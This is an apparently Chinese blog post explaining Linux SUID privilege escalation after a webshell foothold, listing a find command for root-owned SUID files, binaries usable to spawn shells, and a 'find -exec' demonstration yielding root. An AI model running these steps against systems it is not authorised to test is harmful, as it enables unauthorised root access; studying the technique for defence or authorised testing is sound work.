linux 提权SUID

SUID的原理就是将某个命令提升权限,当普通用户去执行时候,可以达到root命令执行的权限

环境:centos

1.拿到webshell后上传脚本linEnum 探针是否有SUID
LinEnum(工具) 查看suid 的文件(Linenum使用记得chomd 777)

手动:

find / -user root -perm -4000 -print 2>/dev/null

 

查看到可以使用suid漏洞的命令 find

以下是一些可用于产生shell的程序
namp
vim
less
more
cp
nano
mv
find

2.使用find命令进行提权

touch yx1
find yx1 -exec whoami \;

root权限。

如果直接whoami

用户是yx。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值